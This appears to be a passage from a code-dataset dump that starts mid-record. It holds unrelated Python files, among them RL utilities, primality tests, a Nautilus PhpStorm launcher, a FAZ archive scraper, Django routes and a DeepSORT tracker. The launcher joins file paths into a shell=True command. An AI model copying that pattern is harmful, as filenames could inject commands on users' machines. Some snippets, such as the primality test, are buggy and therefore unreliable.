range(1, len(data)):\n if data[idx] > max:\n max = data[idx]\n\n print(\"Max is:\", max)\n return max\n\n\"\"\"\nmax = product_prices[0]\nfor idx in range(1, len(product_prices)):\n if product_prices[idx] > max:\n max = product_prices[idx]\n\nprint(\"Max in product_prices is:\", max)\n\nmax = covid_cases[0]\nfor idx in range(1, len(covid_cases)):\n if covid_cases[idx] > max:\n max = covid_cases[idx]\n\nprint(\"Max in covid_cases is:\", max)\n\nmax = ipl_team_scores[0]\nfor idx in range(1, len(ipl_team_scores)):\n if ipl_team_scores[idx] > max:\n max = ipl_team_scores[idx]\n\nprint(\"Max in ipl_team_scores is:\", max)\n\"\"\"\nresult = get_max(product_prices)\nprint(\"Max in product_prices is:\", result)\nprint(\"Max in covid_cases is:\", get_max(covid_cases))\nprint(\"Max in ipl_team_scores is:\", get_max(ipl_team_scores))\n","repo_name":"ishantk/GW2022PD1","sub_path":"Session4C.py","file_name":"Session4C.py","file_ext":"py","file_size_in_byte":1028,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"51"} +{"seq_id":"1619222486","text":"import ray\nimport itertools\nimport torch\nimport config\n\n\n\ndef process_state_f(observation):\n (obs, rewards, dones, collisions, info) = observation\n x = obs[0][0]\n y = obs[0][1]\n x1 = torch.tensor(x)\n y1 = torch.tensor(y)\n #new_obs = {agent_id: \\\n #(o[0], o[1]) for agent_id, o in obs.items()}\n new_obs = {agent_id: \\\n ( torch.tensor(o[0]).reshape((1,-1)).to(config.device), torch.tensor(o[1]).reshape((1,-1)).to(config.device) ) for agent_id, o in obs.items()}\n\n return new_obs\n\ndef s_a_adv_minibatch(policy, traj_list,gamma, lambda_, seperate_agents = False):# NB: TEST\n \"\"\"traj_list; a list of (sarst, values, logging_info) tuples\n seperate_agents: Whether or not to append trajectories from\n different agents in the same environmnet. If homogeneous agents, \n it can be appended\"\"\"\n states_p1 = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n states_p2 = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n actions = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n advantages = {agent_id: [] for agent_id in traj_list[0][0].keys()}\n\n for trajectory in traj_list:\n (svarst, logging_info) = trajectory\n for agent_id, hldr in svarst.items():\n adv = None\n for i, (s, v, a, r, s_n, t) in enumerate(reversed(hldr)):\n if i == 0:\n if t:\n adv = r - v.item()\n else:\n a_prob,v_next = policy(*s_n)\n adv = r + gamma * v_next.item() - v.item()\n else:\n if t: \n adv = r - v.item()\n else:\n adv = r + gamma * lambda_ * adv - v.item()\n states_p1[agent_id].append(s[0])\n states_p2[agent_id].append(s[1])\n actions[agent_id].append(a)\n advantages[agent_id].append(adv)\n if seperate_agents != True:\n states_p1 = list(itertools.chain.from_iterable(states_p1.values()))\n states_p2 = list(itertools.chain.from_iterable(states_p2.values()))\n actions = list(itertools.chain.from_iterable(actions.values()))\n advantages = list(itertools.chain.from_iterable(advantages.values()))\n\n states_p1 = torch.cat(states_p1, dim=0)\n states_p2 = torch.cat(states_p2, dim=0)\n actions = torch.cat(actions, dim = 0)\n advantages = torch.tensor(advantages).reshape((-1,1))\n\n else:\n for agent_id, s in states_p1.items():\n states_p1[agent_id] = torch.cat(s, dim = 0)\n for agent_id, s in states_p2.items():\n states_p2[agent_id] = torch.cat(s, dim = 0)\n for agent_id, a in actions.items():\n actions[agent_id] = torch.cat(a, dim = 0)\n for agent_id, adv in advantages.items():\n advantages[agent_id] = torch.tensor(adv).reshape((-1,1))\n \n return (states_p1, states_p2), actions, advantages\n\n\n \n\n\n\n#@ray.remote(num_cpus = 1, num_gpus=0.1)\nclass env_inst():\n def __init__(self, env, n_step, process_state_f):\n self.env = env\n self.n_step = n_step\n self.obs_next = None\n self.process_state = process_state_f\n\n def get_env(self):\n return self.env\n\n def rollout(self,policy):\n svarst = {agent_id:[] for agent_id in self.env.agents.keys()} #State, action, reward, ter\n values = {agent_id:[] for agent_id in self.env.agents.keys()} #State values list\n logging_info = []\n if self.obs_next == None:\n obs = self.env.reset()\n else:\n obs = self.obs_next\n \n for i in range(self.n_step):\n o = self.process_state(obs)\n a ={}\n for agent_id in self.env.agents.keys():\n a_prob, v = policy.forward(*o[agent_id])\n a[agent_id] = policy.get_action(a_prob)\n values[agent_id] = v\n\n \n\n self.obs_next = self.env.step(a)\n\n o_next = self.process_state(self.obs_next)\n\n for agent_id in self.env.agents.keys():\n svarst[agent_id].append((o[agent_id], v, a[agent_id], self.obs_next[1][agent_id], o_next[agent_id], self.obs_next[-1][\"terminate\"]))\n\n if svarst[0][-1][-1]:\n obs = self.env.reset()\n logging_info.append(self.obs_next[-1])\n else:\n obs = self.obs_next\n return (svarst, logging_info)\n \n\n\n\n\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n trans = []\n #np.random.seed(1)\n for i in range(t):\n if self.global_T == 0:\n self.env.seed(sdr.get())\n self.this_state = torch.tensor([self.env.reset()], dtype=torch.float)\n \n \n\n _, a_prob = policy.forward(self.this_state)\n a = policy.get_action(a_prob).squeeze().item()\n\n #a = np.random.choice([0,1])\n\n s_next,r,ter,_ = self.env.step(a)\n s_next = torch.tensor([s_next], dtype=torch.float)\n self.r_log_hldr.append(r)\n trans.append(sar(self.this_state, a, r, s_next,a_prob.squeeze()[a].item(), ter))\n\n self.global_T += 1\n self.this_state = s_next\n\n if ter:\n self.global_T = 0\n self.r_log = self.r_log_hldr[:]\n self.r_log_hldr = []\n return trans\n return trans","repo_name":"Jamesellis51015/Multi-Agent-Path-Finding-with-Reinforcement-Learning","sub_path":"utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5543,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"51"} +{"seq_id":"19359089297","text":"# 3: Primality Test: Implement three primality test \n# functions using the two following approaches:\n\nimport math\n\n# 3.1: Trial division: For an input n, check if there is a prime number between 2 \n# and √n that divides n\ndef trial(n):\n\n\ta = 2\n\tb = math.ceil(math.sqrt(n))\n\n\twhile a < b:\n\t\tif (n%a == 0):\n\t\t\ta = b + 1\n\t\telse:\n\t\t\ta = a + 1\n\n\tif a == b:\n\t\tprint(n, \"is a prime number \\n\")\n\telse:\n\t\tprint(n, \"is not prime \\n\") \n\ntrial(8)\ntrial(827)\ntrial(83)\n\n\n# 3.2: Using Sieve of Eratosthenes.\ndef eratosthenes(n):\n\n\ta = 2\n\tmyList = []\n\n\twhile(a <= n):\n\t\tmyList.append(a)\n\t\ta = a + 1\n\n\tc = 2\n\td = 3\n\twhile (c < a):\n\t\t\n\t\twhile(d < a):\n\t\t\tif (d%c == 0) and d in myList:\n\t\t\t\tmyList.remove(d)\n\t\t\td = d + 1\n\n\t\tc = c + 1\n\t\td = c + 1\n\n\t\ti = 0\n\twhile i < len(myList):\n\t\tif n%myList[i] == 0 and n != myList[i]:\n\t\t\tprint(n, \"is not prime\")\n\t\t\ti = len(myList) + 1\n\t\telse:\n\t\t\ti = i + 1\n\n\tif i == len(myList):\n\t\tprint(n, \"is prime\")\n\neratosthenes(5)\neratosthenes(20)\neratosthenes(37)\n\n# 3.3: Fermat little theorem BONUS.\n#def flt()\n\n\n\n","repo_name":"honganndo/python-prime-project","sub_path":"DS_3primality.py","file_name":"DS_3primality.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"32139892540","text":"from gi import require_version\nrequire_version('Gtk', '3.0')\nrequire_version('Nautilus', '3.0')\nfrom gi.repository import Nautilus, GObject\nfrom subprocess import call\nimport os\n\n# path to vscode\nPHPSTORM = '/opt/PhpStorm-212.5284.49/bin/phpstorm.sh'\n\n# what name do you want to see in the context menu?\nDISPLAYNAME = 'PhpStorm'\n\n# always create new window?\nNEWWINDOW = False\n\n\nclass PhpStormExtension(GObject.GObject, Nautilus.MenuProvider):\n\n def launch_phpstorm(self, menu, files):\n safepaths = '' \n\n for file in files:\n filepath = file.get_location().get_path()\n safepaths += '\"' + filepath + '\" '\n\n # If one of the files we are trying to open is a folder\n # create a new instance of vscode\n # if os.path.isdir(filepath) and os.path.exists(filepath):\n # args = '--new-window '\n\n # if NEWWINDOW:\n # args = '--new-window '\n\n call(PHPSTORM + ' ' + safepaths + '&', shell=True)\n\n def get_file_items(self, window, files):\n item = Nautilus.MenuItem(\n name='PhpStormOpen',\n label='Open in ' + DISPLAYNAME,\n tip='Opens the selected files with PhpStorm'\n )\n item.connect('activate', self.launch_phpstorm, files)\n\n return [item]\n\n def get_background_items(self, window, file_):\n item = Nautilus.MenuItem(\n name='PhpStormOpenBackground',\n label='Open in ' + DISPLAYNAME,\n tip='Opens the current directory in PhpStorm'\n )\n item.connect('activate', self.launch_phpstorm, [file_])\n\n return [item]\n\n","repo_name":"luccui000/my-ubuntu-setup","sub_path":"php-nautilus.py","file_name":"php-nautilus.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30574269503","text":"from splinter import Browser\nfrom selenium.webdriver.chrome.options import Options\nfrom bs4 import BeautifulSoup\nimport constants\nimport random\nimport time\nimport re\nfrom sqlite3 import Error\nimport sqlite3\n\n\nchrome_options = Options()\nchrome_options.add_extension('ublock_origin.crx')\nbrowser = Browser('chrome', headless=True, chrome_options=chrome_options)\n\n\ndef db_connect():\n try:\n conn = sqlite3.connect('data.db')\n create_table = \"\"\"CREATE TABLE IF NOT EXISTS data (\n ID INTEGER PRIMARY KEY AUTOINCREMENT,\n query TEXT NOT NULL,\n title TEXT NOT NULL,\n text TEXT NOT NULL,\n date_published DATE NOT NULL,\n name TEXT NOT NULL\n );\"\"\"\n conn.execute(create_table)\n return conn\n except Error as e:\n print(e)\n return None\n\n\ndef insert_row(conn, query, title, text, date_published, name):\n cur = conn.cursor()\n cur.execute(\"SELECT 1 FROM data WHERE title = ? AND name = ? AND date_published = ? LIMIT 1\", (title, name, date_published))\n if not cur.fetchone():\n conn.execute(\"INSERT INTO data (query, title, text, date_published, name) VALUES (?, ?, ?, ?, ?);\", (query, title, text, date_published, name))\n conn.commit()\n return True\n\n\ndef slumber(min, max):\n time.sleep(random.randint(min, max))\n\n\ndef login():\n url = 'https://acces-distant.sciencespo.fr/fork?https://www.faz-biblionet.de/faz-portal'\n browser.visit(url)\n slumber(1, 3)\n browser.fill('username', constants.username)\n browser.fill('password', constants.password)\n slumber(1, 3)\n browser.find_by_xpath('/html/body/div/div/div[2]/div[1]/form/div[4]/input[4]').click()\n slumber(5, 15)\n\n\ndef click_button(row):\n buttons = row.find_by_css('.hit-link-button')\n for button in buttons:\n article_text = re.sub(r\"[\\n\\t\\s]*\", \"\", button.text)\n if article_text == 'Artikel':\n button.click()\n return True\n\n\ndef search(conn, name, institution):\n query = f'{name} AND {institution} NOT Interview'\n url = f'https://www-faz-biblionet-de.acces-distant.sciencespo.fr/faz-portal/faz-archiv?q={query}&DT_from={constants.dt_from}&DT_to={constants.dt_to}'\n browser.visit(url)\n slumber(3, 6)\n\n cookies_accept = browser.find_by_css('.cb-enable')\n if cookies_accept:\n cookies_accept.click()\n\n c = 0\n\n rows = browser.find_by_css('.article-row')\n if len(rows):\n row = rows[0]\n if click_button(row):\n slumber(3, 6)\n while True:\n try:\n soup = BeautifulSoup(browser.html, 'lxml')\n if \"The system has detected a very high use of electronic resources\" in soup.text:\n input('DAMN! Wait FOR 120mins')\n soup = BeautifulSoup(browser.html, 'lxml')\n\n document = soup.select_one('.single-document')\n\n date_published = soup.select_one('.document-article-infos').select('td')[1].text.strip()\n dd = date_published.split('.')\n day = dd[0]\n month = dd[1]\n year = dd[2]\n date_published = f'{year}-{day}-{month}'\n\n title = document.select_one('pre.docTitle')\n if title:\n title = title.text.strip()\n else:\n title = f'{name} - {institution} - {date_published}'\n\n contents = ''\n for texts in document.select('pre.text'):\n contents += texts.text.strip()\n\n if insert_row(conn, query, title, contents, date_published, name):\n c += 1\n print('count:', c)\n print('name:', name)\n print('title:', title)\n print('date_published:', date_published)\n print('text:', len(contents))\n print('-' * 10)\n except Exception as e:\n print(e)\n\n next_button = browser.find_by_css('a.next-link')\n if next_button:\n next_button.first.click()\n slumber(20, 60)\n else:\n print('No more articles')\n return\n\n\ndef main():\n start_time = time.time()\n\n conn = db_connect()\n login()\n for item in constants.names:\n search(conn, item['name'], item['institution'])\n conn.close()\n\n end_time = (time.time() - start_time)\n print(f'Execution time in minutes: {end_time / 60}')\n browser.quit()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Moritz-Pfeifer/Fiscal-Dominance","sub_path":"Web-Scraping-Tools/scraper-biblionet-main/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"37553872624","text":"from rest_framework.routers import DefaultRouter\n\nfrom shop.api_v1_views import ShopsViewSet, CategoriesViewSet, ProductViewSet, CreateWithYamlViewSet, ParametersViewSet, \\\n ContactsViewSet, OrdersViewSet, ProductInfoViewSet\n\nrouter = DefaultRouter()\nrouter.register(\"shops\", ShopsViewSet, basename=\"all_shops\")\nrouter.register(\"categories\", CategoriesViewSet, basename=\"all_categories\")\nrouter.register(\"products\", ProductViewSet, basename=\"all_products\")\nrouter.register(\"create-yml\", CreateWithYamlViewSet, basename=\"create_yml\")\nrouter.register(\"parameters\", ParametersViewSet, basename=\"all_parameters\")\nrouter.register(\"contacts\", ContactsViewSet, basename=\"contacts\")\nrouter.register(\"orders\", OrdersViewSet, basename=\"orders\")\nrouter.register(\"product-info\", ProductInfoViewSet, basename=\"product_info\")\n\n\nurlpatterns = [] + router.urls\n","repo_name":"SaD-Pr0gEr/Store-playground-api","sub_path":"shop/api_v1_urls.py","file_name":"api_v1_urls.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"28236425545","text":"import gzip\nimport re\nfrom email import charset, message_from_string\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nfrom StringIO import StringIO\n\nimport yaml\n\n# Load the part handler. Note that this is only used on the guest.\n# On metavisor, we handle the parts in the cloudinit handler.\nfile_writer_handler = \"\"\"\n#part-handler\n\nimport os\nimport yaml\nimport pwd\nimport grp\n\n\ndef list_types():\n return [\"text/brkt-files\", \"text/brkt-guest-files\"]\n\n\ndef str2oct(s):\n '''Returns an integer from an octal string.'''\n return int(s, 8)\n\n\ndef output(msg):\n with open('/tmp/file_writer.out', 'a') as fd:\n fd.write('file_writer.handler: %s\\\\n' % (msg,))\n print \"file_writer.handler: %s\" % (msg,)\n\n\ndef handle_part(data, ctype, filename, payload):\n if ctype in ('__begin__', '__end__'):\n return\n\n file_config = yaml.safe_load(payload)\n\n for filename, config in file_config.iteritems():\n output('working on %s' % (filename,))\n file_dir = os.path.dirname(filename)\n if config.get('permissions'):\n file_mask = 0777 - config['permissions']\n dir_mask = 0777 - (config['permissions'] + 0111)\n\n # Use the current user as the owner of the file, unless they specify\n # them\n chowner = [-1, -1]\n if config.get('owner'):\n owner = config['owner']\n if isinstance(owner, str):\n owner = pwd.getpwnam(owner).pw_uid\n chowner[0] = owner\n if config.get('group'):\n group = config['group']\n if isinstance(group, str):\n group = grp.getgrnam(group).gr_gid\n chowner[1] = group\n\n if not os.path.exists(file_dir):\n old_umask = None\n if config.get('permissions'):\n old_umask = os.umask(dir_mask)\n output('creating directory %s' % (file_dir,))\n os.makedirs(file_dir)\n if old_umask is not None:\n os.umask(old_umask)\n os.chown(file_dir, *chowner)\n\n old_umask = None\n if config.get('permissions'):\n old_umask = os.umask(file_mask)\n with open(filename, 'w') as fd:\n output('writing file %s' % (filename,))\n fd.write(config.get('contents', ''))\n if old_umask is not None:\n os.umask(old_umask)\n os.chown(filename, *chowner)\n\"\"\"\n\n\n# Avoid base64 encoding the MIME parts\nUTF8_CHARSET = charset.Charset('utf-8')\nUTF8_CHARSET.body_encoding = None # Python defaults to BASE64\n\n\ndef _new_mime_part(container, content_type, payload):\n # MIMEText will prepend to the content_type\n content_type = re.sub(r'^text/', '', content_type)\n message = MIMEText(payload, content_type, 'utf-8')\n del message['Content-Transfer-Encoding']\n message.set_payload(payload, UTF8_CHARSET)\n container.attach(message)\n\n\ndef get_mime_part_payload(mime_data, part_content_type):\n \"\"\" Return the payload for the part with the specified content-type.\n\n Returns None if a part with the specified content-type is not found.\n \"\"\"\n msg = message_from_string(mime_data)\n\n for part in msg.walk():\n if part.get_content_type() != part_content_type:\n continue\n return part.get_payload(decode=True)\n return None\n\n\nclass UserDataContainer(object):\n def __init__(self):\n self.parts = []\n self.files_config = {}\n self.add_part('text/part-handler', file_writer_handler)\n\n def add_part(self, mimetype, content):\n self.parts.append((mimetype, content))\n\n def add_file(self, filename, content, content_type):\n if content_type not in self.files_config:\n self.files_config[content_type] = {}\n self.files_config[content_type][filename] = {\n 'contents': content,\n }\n\n def to_mime_text(self):\n # These hard coded strings are to avoid having diffs in userdata\n # when nothing changed. Without this AWS sees the userdata has changed\n # (the MIME boundary or \"unixfrom\" changed) and it relaunches the\n # instance to give it new data.\n container = MIMEMultipart(boundary='--===============HI-20131203==--')\n container._unixfrom = 'From nobody Tue Dec 3 19:00:57 2013'\n for part in self.parts:\n _new_mime_part(container, part[0], part[1])\n\n if self.files_config:\n for (content_type, files) in self.files_config.iteritems():\n _new_mime_part(container, content_type, yaml.safe_dump(files))\n\n return str(container)\n\n\ndef gzip_user_data(user_data_string):\n out = StringIO()\n with gzip.GzipFile(fileobj=out, mode=\"w\") as f:\n f.write(user_data_string)\n return out.getvalue()\n","repo_name":"patlachance/brkt-cli","sub_path":"brkt_cli/user_data.py","file_name":"user_data.py","file_ext":"py","file_size_in_byte":4760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"12570914570","text":"N, M = map(int, input().split())\r\nS = [list(str(input())) for i in range(N)]\r\n\r\n# print(S)\r\ncount = 0\r\nfor i in range(len(S) - 1):\r\n for j in range(i + 1, len(S)):\r\n # print(S[i], S[j])\r\n # print(i, j)\r\n for k in range(M):\r\n if S[i][k] == \"x\" and S[j][k] == \"x\":\r\n\r\n break\r\n else:\r\n count += 1\r\n\r\nprint(count)\r\n","repo_name":"ridge0321/Atcoder_Submissons","sub_path":"submissions/abc282/abc282_b.py","file_name":"abc282_b.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"71607427678","text":"#!/usr/bin/env python \n# -*- coding: utf-8 -*- \n# @Time : 2019/12/19 18:29 \n# @Author : Alisen \n# @File : romanToInt.py\nclass Solution:\n def romanToInt(self, s: str) -> int:\n dic = {\n 'I':1,\n 'V':5,\n 'X':10,\n 'L':50,\n 'C':100,\n 'D':500,\n 'M':1000,\n }\n\n result = 0\n for index,item in enumerate(s[::-1]):\n if item not in dic:\n assert None\n if index <=0:\n result += dic[item]\n continue\n if (item is 'I') and (s[::-1][index-1] is 'V' or s[::-1][index-1] is 'X'):\n result -= dic[item]\n elif (item is 'X') and (s[::-1][index-1] is 'L' or s[::-1][index-1] is 'C'):\n result -= dic[item]\n elif (item is 'C') and (s[::-1][index -1] is 'D' or s[::-1][index-1] is 'M'):\n result -= dic[item]\n else:\n result += dic[item]\n return result\n\nif __name__ == '__main__':\n res = Solution().romanToInt(\"IVVIX\")\n print(res)","repo_name":"alisen39/algorithm","sub_path":"algorithms/romanToInt.py","file_name":"romanToInt.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1002206426","text":"\"\"\"\r\nThis module provides a set of functions which perform measure\r\noperations on mamba images. It works with imageMb instances as defined in mamba.\r\n\"\"\"\r\n\r\n# Contributors: Serge BEUCHER, Nicolas BEUCHER\r\n\r\nfrom __future__ import division\r\n\r\nfrom mambaIm.mambaCore import ERR_BAD_DEPTH\r\nfrom mambaIm import mamba\r\nimport math\r\n\r\ndef computeArea(imIn, scale=(1.0, 1.0)):\r\n \"\"\"\r\n Calculates the area of the binary image 'imIn'. 'scale' is a tuple \r\n containing the horizontal scale factor (distance between two adjacent \r\n horizontal points) and the vertical scale factor (distance between two \r\n successive lines) of image 'imIn' (default is 1.0 for both). The result is\r\n a float (when default values are used, the result value is identical to the\r\n computeVolume operator).\r\n \r\n Note that, with hexagonal grid, the \"scale' default values do not correspond\r\n to an isotropic grid (where triangles would be equilateral).\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n a = scale[0]*scale[1]*mamba.computeVolume(imIn)\r\n return a\r\n\r\ndef computeDiameter(imIn, dir, scale=(1.0, 1.0), grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the diameter (diametral variation) of binary image 'imIn' in \r\n direction 'dir'. 'scale' is a tuple defining the horizontal and vertical\r\n scale factors (default is 1.0).\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n if dir == 0:\r\n return 0.0\r\n dir = ((dir - 1)%(mamba.gridNeighbors(grid)//2)) +1\r\n imWrk = mamba.imageMb(imIn)\r\n mamba.copy(imIn, imWrk)\r\n mamba.diffNeighbor(imIn, imWrk, dir, grid=grid)\r\n if grid == mamba.HEXAGONAL:\r\n l = scale[1]\r\n if dir != 2:\r\n l = 2*l*scale[0]/math.sqrt(scale[0]*scale[0] + 4*scale[1]*scale[1])\r\n else:\r\n if dir == 1:\r\n l = scale[0]\r\n elif dir == 3:\r\n l = scale[1]\r\n else:\r\n l = scale[0]*scale[1]/math.sqrt(scale[0]*scale[0] + scale[1]*scale[1])\r\n l = l*mamba.computeVolume(imWrk)\r\n return l\r\n\r\ndef computePerimeter(imIn, scale=(1.0, 1.0), grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the perimeter of all particles in binary image 'imIn' according\r\n to the Cauchy-Crofton formula. 'scale' is a tuple defining the horizontal\r\n and vertical scale factors (default is 1.0).\r\n \r\n The edge of the image is always set to 'EMPTY'.\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n p = 0.\r\n for i in range(1, mamba.gridNeighbors(grid)//2 + 1):\r\n p += computeDiameter(imIn, i, scale=scale, grid=grid)\r\n p = 2*math.pi*p/mamba.gridNeighbors(grid)\r\n return p\r\n \r\ndef computeConnectivityNumber(imIn, grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the connectivity number (Euler_Poincare constant) of image 'ImIn'.\r\n The result is an integer number.\r\n \r\n Beware, if the input image 'imIn' is not a binary image, the function raises\r\n an error.\r\n \"\"\"\r\n \r\n if imIn.getDepth() != 1:\r\n mamba.raiseExceptionOnError(ERR_BAD_DEPTH)\r\n imWrk = mamba.imageMb(imIn)\r\n if grid == mamba.HEXAGONAL:\r\n mamba.hitOrMiss(imIn, imWrk, 66, 1, grid=grid)\r\n n = mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 2, 5, grid=grid)\r\n n = n - mamba.computeVolume(imWrk) \r\n else:\r\n mamba.hitOrMiss(imIn, imWrk, 56, 1, grid=grid)\r\n n = mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 16, 41, grid=grid)\r\n n = n - mamba.computeVolume(imWrk)\r\n mamba.hitOrMiss(imIn, imWrk, 40, 17, grid=grid)\r\n n = n + mamba.computeVolume(imWrk)\r\n return n\r\n\r\ndef computeComponentsNumber(imIn, grid=mamba.DEFAULT_GRID):\r\n \"\"\"\r\n Computes the number of connected components in image 'imIn'. The result is\r\n an integer value.\r\n \"\"\"\r\n \r\n imWrk = mamba.imageMb(imIn, 32)\r\n return mamba.label(imIn, imWrk, grid=grid)\r\n \r\n\r\ndef computeFeretDiameters(imIn, scale=(1.0, 1.0)):\r\n \"\"\"\r\n computes the global Feret diameters (horizontal and vertical) of binary \r\n image 'imIn' and returns the result in a tuple (hDf, vDf). These diameters \r\n correspond to the horizontal and vertical dimensions of the smallest \r\n bonding box containing all the particles of 'imIn'\r\n \"\"\"\r\n \r\n s = mamba.extractFrame(imIn, 1)\r\n return (scale[0]*(s[2]-s[0]), scale[1]*(s[3]-s[1]))\r\n\r\n","repo_name":"FabriceSalvaire/mamba-image","sub_path":"src/mambaApi/python/mambaComposed/measure.py","file_name":"measure.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"26209303423","text":"from django.conf.urls import url\n\nfrom bootcamp.projects import views\n\nurlpatterns = [\n url(r'^$', views.projects, name='projects'),\n url(r'^connect_repository', views.connect_repository, name='connect_repository'),\n url(r'^access_repository', views.access_repository, name='access_repository'),\n url(r'^dropbox_auth_start', views.dropbox_auth_start, name='dropbox_auth_start'),\n url(r'^dropbox_auth_finish', views.dropbox_auth_finish, name='dropbox_auth_finish'),\n url(r'^search/$', views.search_projects, name='search_projects'),\n url(r'^write/$', views.write, name='write'),\n url(r'^preview/$', views.preview, name='preview'),\n url(r'^drafts/$', views.drafts, name='drafts'),\n url(r'^comment/$', views.comment, name='comment'),\n url(r'^tag/(?P.+)/$', views.tag, name='tag'),\n url(r'^author/(?P.+)/$', views.author, name='author'),\n url(r'^edit/(?P\\d+)/$', views.edit, name='edit_project'),\n url(r'^collaborator_lookup/$', views.collaborator_lookup, name='collaborator_lookup'),\n url(r'^(?P[-\\w]+)/$', views.project, name='project'),\n]\n","repo_name":"braindeadpool/pharos","sub_path":"bootcamp/projects/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"51"} +{"seq_id":"34468499187","text":"from django.http import HttpResponse\nfrom django.shortcuts import render\n\nfrom Plata import models\n\n\ndef index(request):\n try:\n data = models.Data.objects.all()[0].string\n\n finally:\n return render(request, \"index.html\",\n {\"data\": list(data)})\n\n\ndef send(request, string):\n models.Data.objects.all().delete()\n data = models.Data()\n data.string = string\n data.save()\n return HttpResponse(status=201)\n","repo_name":"khokhlovn/PlataTest","sub_path":"Plata/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"27840874499","text":"import sys, os\nsys.stdin = open(f'{os.path.dirname(os.path.realpath(__file__))}/input.txt', \"rt\")\n\ndef DFS(L, s, sum):\n global cnt\n if L == k:\n if sum % m == 0:\n cnt += 1\n else:\n for i in range(s, n):\n DFS(L+1, i+1, sum + a[i])\n \n\nif __name__ == \"__main__\":\n n, k = map(int, input().split())\n a = list(map(int, input().split()))\n m = int(input())\n sum = 0\n cnt = 0\n DFS(0, 0, 0)\n print(cnt)\n","repo_name":"what-is-cote/teamble-developer","sub_path":"sophia/Section6/11. 수들의 조합/my.py","file_name":"my.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"8717398185","text":"import numpy as np\nimport torch\nfrom PIL import Image\nfrom .deep.extractor import Extractorv3\nfrom .deep.extractor import Extractorv3_try_ad\nfrom .deep.extractor import ModelExtractor\nfrom .sort.nn_matching import NearestNeighborDistanceMetric\nfrom .sort.preprocessing import non_max_suppression\nfrom .sort.detection import Detection\nfrom .sort.tracker import Tracker\n\n__all__ = ['DeepSortFace']\n\n\nclass DeepSortFace(object):\n def __init__(self, model_path, max_dist=0.2, min_confidence=0.3, nms_max_overlap=1.0, max_iou_distance=0.7,\n max_age=70, n_init=3, nn_budget=100, use_cuda=True):\n self.min_confidence = min_confidence\n self.nms_max_overlap = nms_max_overlap\n\n # ************************* face embedding *************************\n \n\n ## reid model\n #reid_model_path=r'D:\\openVINO\\working_code_deep_sort\\DeepSORT_Object-master\\deep_sort\\deep\\person-reidentification-retail-0287.xml'\n self.extractor = ModelExtractor(use_cuda=use_cuda)\n\n #print(\"model loaded\",self.extractor)\n #print('Extractor is loading -->>',self.extractor)\n \n #self.extractor = Extractorv3(use_cuda=use_cuda)\n #self.extractor =Extractorv3_try_ad(use_cuda=use_cuda)\n # ******************************************************************\n max_cosine_distance = max_dist\n nn_budget = 100\n metric = NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n\n # tracker maintain a list contains(self.tracks) for each Track object\n self.tracker = Tracker(metric, max_iou_distance=max_iou_distance, max_age=max_age, n_init=n_init)\n\n def update(self, bbox_xywh, confidences,classes, ori_img):\n # bbox_xywh (#obj,4), [xc,yc, w, h] bounding box for each person\n # conf (#obj,1)\n\n self.height, self.width = ori_img.shape[:2]\n\n # get appearance feature with neural network (Deep) *********************************************************\n features = self._get_features(bbox_xywh, ori_img)\n\n bbox_tlwh = self._xywh_to_tlwh(bbox_xywh) # # [cx,cy,w,h] -> [x1,y1,w,h] top left\n\n # generate detections class object for each person *********************************************************\n # filter object with less confidence\n # each Detection obj maintain the location(bbox_tlwh), confidence(conf), and appearance feature\n detections = [Detection(bbox_tlwh[i], conf, features[i]) for i, conf in enumerate(confidences) if\n conf > self.min_confidence]\n\n # run on non-maximum supression (useless) *******************************************************************\n 